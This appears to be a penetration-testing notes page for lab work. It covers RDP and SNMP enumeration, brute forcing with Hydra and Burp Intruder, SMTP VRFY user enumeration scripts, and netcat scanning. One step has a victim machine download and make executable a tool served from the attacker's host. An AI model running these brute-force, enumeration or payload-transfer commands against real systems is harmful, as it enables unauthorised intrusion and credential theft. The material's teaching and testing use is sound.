Shuciran Pentesting Notes

RDP (tcp-3389)

NMAP Multiple Vulns nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 10.11.1.7 Brute Force Hydra hydra -l pedro -P /usr/share/wordlists/rockyou.txt 10.11.1.7 rdp ...

SNMP (udp-161)

SNMPWALK Enumerate the entire public community using SNMPv2, -t 10 to increase the timeout period to 10 seconds: snmpwalk -v 2c -c Public -t 10 10.10.11.107 snmpcheck 10.10.202.78 -c Public Exampl...

PHPMyAdmin Brute Force via Burpsuite Intruder

Burp Suite Intruder Since the default credentials didn’t seem to work and blank passwords aren’t allowed, let’s try to automate some basic username and password combinations with Burp Suite’s Intr...

Local Web Server

Python3 Via web: # On our machine: python3 -m http.server 8888 # On victim machine: wget http://10.10.16.5:8888/pspy64 chmod +x pspy64 Python2 python -m SimpleHTTPServer 7331 PHP php -S 0.0....

User Enumeration Gathering

The Harvester theHarvester -d megacorpone.com -b google The Harvester does not work well on newer versions of Kali; use the Docker image if that is the case. docker run -ti --rm thehar...

Nikto

The simplest option is to set the -maxtime option, which will halt the scan after the specified time limit: nikto -host=http://www.megacorpone.com -maxtime=30s Our second option is to tune the sca...

Search Engines

Shodan Shodan is a search engine for devices connected to the Internet. Several filters are available in Shodan searches, among them: hostname, port, country. Censys Censys Search Engine ...

SNMP Read and Write Community Abuse

SNMP Priv Escalation If port 161 is open internally, search for the /etc/snmp/snmpd.conf file and review its content; notice that the private community is readable and writable: rocommunity public...
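When reviewing snmpd.conf as described above, what matters is which community strings grant write access and from which sources. The following is an added example (not from the original notes) that parses the net-snmp `rocommunity`/`rwcommunity` directives and flags writable communities open to any source; the sample configuration embedded in it is constructed for illustration, and the option names it understands (`default` source, `-V view`) are net-snmp's.

```python
"""Audit an snmpd.conf for community strings and their access level.

Added example, not part of the original notes. It assumes net-snmp's
snmpd.conf syntax: `rocommunity`/`rwcommunity` (and the IPv6 variants)
followed by the community string, an optional source restriction and an
optional `-V view`. The sample config below is constructed.
"""
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample resembling the case in the notes: a read-only "public"
# community and a read-write "private" community with no source restriction.
SAMPLE_SNMPD_CONF = """\
# /etc/snmp/snmpd.conf (constructed sample)
rocommunity public default -V systemonly
rwcommunity private
rocommunity6 public default
com2sec readonly  default         public
"""

# keyword, community, optional source (must not look like an option), optional view
COMMUNITY_RE = re.compile(
    r'^\s*(?P<kw>r[ow]community6?)\s+(?P<community>\S+)'
    r'(?:\s+(?P<source>[^-\s]\S*))?(?:\s+-V\s+(?P<view>\S+))?'
)


@dataclass
class CommunityEntry:
    community: str
    access: str            # "read" or "write"
    source: str            # "default" means any source address
    view: Optional[str]    # restricted MIB view, if any

    @property
    def risky(self) -> bool:
        # Writable from any source: an attacker who reaches udp/161 can set
        # MIB objects with this community, which is the privilege escalation
        # path the notes point at.
        return self.access == "write" and self.source == "default"


def parse_snmpd_conf(text: str) -> list:
    """Return one CommunityEntry per ro/rw community directive."""
    entries = []
    for line in text.splitlines():
        line = line.split('#', 1)[0]          # drop comments
        m = COMMUNITY_RE.match(line)
        if not m:
            continue                          # com2sec, views, etc. are ignored
        access = "write" if m.group("kw").startswith("rw") else "read"
        entries.append(CommunityEntry(
            community=m.group("community"),
            access=access,
            source=m.group("source") or "default",
            view=m.group("view"),
        ))
    return entries


def writable_communities(text: str) -> list:
    """Community strings that grant write access, in file order."""
    return [e.community for e in parse_snmpd_conf(text) if e.access == "write"]


if __name__ == "__main__":
    for e in parse_snmpd_conf(SAMPLE_SNMPD_CONF):
        flag = "  <-- writable from any source" if e.risky else ""
        print(f"{e.access:5} {e.community:10} source={e.source} view={e.view}{flag}")
```

Run it against a copied `/etc/snmp/snmpd.conf` by replacing `SAMPLE_SNMPD_CONF` with the file contents; a writable community reachable from `default` is the finding to act on.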

SMTP (tcp-25)

VRFY USER ENUMERATION With user and IP as input by the user: #!/usr/bin/python import socket import sys if len(sys.argv) != 3: print("Usage: vrfy.py <IP> <users_list>") ...
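The script excerpt above connects and sends `VRFY` per user; the part a practitioner also wants is the interpretation of the reply codes, since many MTAs answer 252 (will not verify) or 502 (VRFY disabled) rather than a clean 250/550. The following is an added example, not the original script: it keeps the same one-connection-per-user flow, classifies replies, and takes an injectable connection factory so the logic can be checked offline against a constructed fake server.

```python
"""SMTP VRFY user enumeration with reply-code classification.

Added example extending the notes' script; not the original. Assumes a
plain SMTP service on tcp/25 that answers VRFY. FakeSMTPSocket and its
banner/replies are constructed for the offline check.
"""
import socket
import sys
from typing import Callable, Dict, Iterable


def classify(reply: str) -> str:
    """250 = user exists, 550/551/553 = unknown user,
    252 = server refuses to verify (inconclusive), 500/502 = VRFY disabled."""
    code = reply[:3]
    if code == "250":
        return "valid"
    if code in ("550", "551", "553"):
        return "invalid"
    if code in ("500", "502"):
        return "disabled"
    return "unknown"


def read_reply(sock) -> str:
    """Read one SMTP reply; the final line has a space (not '-') after the code."""
    data = b""
    while True:
        chunk = sock.recv(1024)
        if not chunk:
            break
        data += chunk
        lines = data.decode(errors="replace").splitlines()
        if lines and len(lines[-1]) >= 4 and lines[-1][3] == " ":
            break
    return data.decode(errors="replace").strip()


def vrfy_users(users: Iterable[str], connect: Callable[[], object]) -> Dict[str, str]:
    """Return {user: verdict}, one connection per user like the notes' script."""
    results = {}
    for user in users:
        sock = connect()
        try:
            read_reply(sock)                       # consume the 220 banner
            sock.send(f"VRFY {user}\r\n".encode())
            results[user] = classify(read_reply(sock))
        finally:
            sock.close()
    return results


def tcp_connect(ip: str, port: int = 25, timeout: float = 5.0) -> Callable[[], socket.socket]:
    return lambda: socket.create_connection((ip, port), timeout=timeout)


class FakeSMTPSocket:
    """Constructed stand-in for socket.socket so the example runs offline."""
    KNOWN = {"root", "pedro"}

    def __init__(self):
        self._out = [b"220 mail.example.test ESMTP (constructed banner)\r\n"]

    def recv(self, n: int) -> bytes:
        return self._out.pop(0) if self._out else b""

    def send(self, data: bytes) -> int:
        user = data.decode().split(None, 1)[1].strip()
        if user in self.KNOWN:
            self._out.append(f"250 2.1.5 <{user}@example.test>\r\n".encode())
        else:
            self._out.append(f"550 5.1.1 <{user}>: User unknown\r\n".encode())
        return len(data)

    def close(self) -> None:
        pass


if __name__ == "__main__":
    if len(sys.argv) != 3:
        print("Usage: vrfy.py <IP> <users_list>")
        sys.exit(1)
    with open(sys.argv[2]) as f:
        users = [u.strip() for u in f if u.strip()]
    for user, verdict in vrfy_users(users, tcp_connect(sys.argv[1])).items():
        print(f"{user}: {verdict}")
```

If every user comes back `unknown` or `disabled`, VRFY is not usable on that server and `RCPT TO` after a `MAIL FROM` is the usual fallback for the same enumeration.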

Netcat Port Scanning

TCP Scanning The -w option specifies the connection timeout in seconds and -z is used to specify zero-I/O mode, which will send no data and is used for scanning: nc -nvv -w 1 -z 10.11.1.220 3388-...